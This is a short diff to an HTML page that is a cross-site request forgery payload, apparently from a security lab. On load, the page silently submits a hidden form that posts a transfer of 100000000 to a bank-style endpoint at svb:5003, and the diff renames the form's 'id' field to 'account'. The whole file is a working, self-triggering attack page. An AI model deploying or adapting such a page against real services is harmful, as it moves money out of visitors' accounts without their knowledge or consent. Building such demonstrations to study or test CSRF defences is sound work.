--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
   <body onload="document.bank_form.submit()">
     <form action="http://svb:5003/transfer/1" method="POST" name="bank_form" style="display: none;">
       <input type="text" name="amount" value="100000000" />
-      <input type="text" name="id" value="156" />
+      <input type="text" name="account" value="156" />
     </form>
   </body>
 </html> 
